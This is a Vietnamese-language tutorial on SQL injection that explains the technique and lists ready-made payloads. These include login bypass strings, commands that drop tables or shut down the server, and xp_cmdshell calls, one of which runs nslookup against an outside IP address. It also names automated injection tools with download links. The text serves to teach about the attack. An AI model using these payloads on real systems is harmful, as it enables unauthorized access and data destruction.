Nói thêm về SQL Injection

Nói thêm về SQL

Injection

Đa số các trang web hiện nay,tuỳ thuộc vào nội dung mà thiết

kế cho riêng mình 1 giao diện bắt mắt.Để làm việc này họ chỉ

cần download database từ trên Internet về và sữa đổi dữ liệu

đã được cập nhật từ 1 database.Một trong những nền phổ

biến cho web datastores là SQL.

Một hay nhiều ứng dụng web thì được đơn giản toàn bộ những

script đầu vào bằng cách truy vấn 1 SQL database,bản thân web

server hoặc 1 hệ thống đầu cuối riêng biệt.Một trong những cuộc

tấn công xảo quyệt nhất ứng dụng web bao gồm việc đánh cắp

queries sử dụng bởi bản thân những scripts đầu vào để tước

quyền điều khiển những ứng dụng hoặc dữ liệu của nó.Một trong

những cơ cấu có hiệu quả nhất để thực hiên điều này là kĩ thuật

được mang tên "SQL Injection".

SQL Injection chỉ việc đưa vào những đoạn truy vấn nguy hiểm

TransacSQL vào 1 vị trí để thực hiện những hoạt động không

ngờ.Thường thì những đoạn truy vấn hiện có đơn giản là Edit để

hoàn thành những kết quả tương tự.

TransactSQL thì dễ dàng vận dụng bằng sự thay thế 1 kí tự

đơn,tuỳ thuộc vào sự sáng suốt có kẻ tấn công để đưa ra những

đoạn truy vấn nguy hiểm.

Một số các kí tự thường được sử dụng để chèn dữ lịêu vào hợp lệ

trong bao gồm (');(--);và ;.Chúng có những ý nghĩa đặc biệt trong

Transact SQL.

Chúng ta sẽ tự hỏi là khi hacker đánh cắp được SQL query chúng

sẽ làm gì?.Ban đầu họ có thể xâm nhập trái phép các dữ liệu.Với

những kĩ thuật kín đáo,họ có thể truy cập 1 cách hợp pháp,hoặc

thậm chí là tìm cách hoàn toàn điều khiển toàn bộ webserver

hoặc hệ thống SQL đầu cuối.

Ví dụ về SQL Injection:Để tìm vị trí bị lỗi SQL Injection,ta gõ 1

số từ khoá trong Form field như sau:

+Đăng nhập hợp pháp:

-Xác nhận đúng mà không cần bất kì điều kiện nào:

USER:' OR "='

PASS:' OR "='

-Xác nhận đúng chỉ với username:

USER:admin'--

-Xác nhận đúng như là người dùng đầu tiên trong user table:

USER:' or 1=1--

-Xác nhận đúng như là 1 người dùng giả tạo:

USER:' union select 1,'user','passwd' 1--

+Phá hoại:

-Bỏ 1 bảng dữ liệu:

USER:';drop table users--

-Shutdown dữ liệu từ xa:

USER:aaaaaaaaaaaaaaa'

PASS:';shutdown--

+Thực thi chức năng yêu cầu lấy và lưu trữ những thủ tục:

-Thi hành xp_cmdshell để lấy 1 danh sách thư mục:

http://localhost/script?0';EXEC+master...#39;dir';--

-Thi hành xp_service control để chiếm đoạt service:

http://localhost/script?0';EXECT+maste...;server';--

Không phải cú pháp trên đều làm việc hầu hết trên các dữ

liệu.Thông tin sau sẽ cho biết những phương pháp chúng ta đã sơ

lược phía trên sẽ làm việc hay không trong những nền chứa dữ

liệu.Vì không kẻ bảng được nên mình gõ như sau cho dễ so sánh:

Datapase specific Information:---My SQL----Oracle-----DB2-----

-Postgre-----MSSQL

UNION possible:----------------------Y------------Y---------Y--------

----Y------------Y---

Subselects possible:-----------------N------------Y---------Y----------

--Y------------Y---

Multiple statements:-----------------N(mostly)---N---------N--------

--Y-------------Y--

Default stored procedures:---------_--Many(utf-file)------_----------

_-------M(cmdshell)

Other Comments:----------Supports"intooutfile"-_-------_-----------

_-------------_----

+Các công cụ tự động tìm lỗi SQL injection:

SQL Injection thường được thực hiện bằng kĩ thuật của

hacker,nhưng 1 vài công cụ có thể tự động quá trình nhận dạng

và khai thac chỗ yếu.Wpoison là công cụ có thể phát hiện lỗi

SQLInjection trong các trang web.Những đoạn string tìm lỗi SQL

thì được lưu trữ trong 1 file từ điển,và vì thế nó trở lên dễ dàng

cho bất kì ai thêm vào danh sách từ điển cho riêng mình.Wpoison

chạy trên Linux,có thể download tại:

http://wpoison.sourceforge.net

Ngoài ra còn có công cụ SPIKE Proxy,nó có các chức năng khá

tốt-tự động thực hiện SQL Injection -những d0oạn string sẽ được

Inject tuỳ vào thói quen người sử dụng .SPIKE Proxy là 1 Python

và OpenSSL-công cụ đánh giá ứng dụng web cơ bản có các chức

năng như HTTP và HTTPS Proxy...Nó cho phép người phát triển

web hoặc người quản trị ứng dụng web cấp thấp truy cập vào

tòan bộ phương tiện ứng dụng web,trong khi nó cũng cung cấp 1

nhóm các công cụ tự động và những kĩ năng khám phá ra những

lỗi thông thường,các công cụ đó bao gồm:SQL Injection,Website

Crawler,Login Form Brute Forcer,Automated Overflow

Detection..v.vSpike Proxy chạy trên Win32 và Linux,các bạn có

thể Download tại:

www.immunitysec.com/spike.html

Chú ý là phần mềm này nặng khoảng 13M và máy tính của bạn

phải có sẵn Python và OpenSSL.Trong WinXP công cụ này

không hoạt động.

Mieliekoek.pl là 1 SQL Insertion Crawler,có chức năng kiểm tra

các form liên quan đến lỗi SQL.Scrip này cung cấp 1 công cụ

Web mirroring như là dữ liệu vào,xem xét từng file và nhân diện

sự tồn tại các form trong file.Các chuỗi được Inject có thể dễ

dàng thay đổi trong file cấu hình.Download Mieliekoek tại:

http://packetstormsecurity.nl/UNIX/security/mieliekoek.pl

Công cụ này chỉ hoạt động khi máy bạn đã cài PERL.Sau đây là

1 ví dụ của dữ liệu xuất từ mieliekoek:

$badstring="blah''';

#$badstring="blah' or 1=1 --";

$badstring="blah' exec master..xp_cmdshell 'nslookup a.com

196.30.67.5' - ';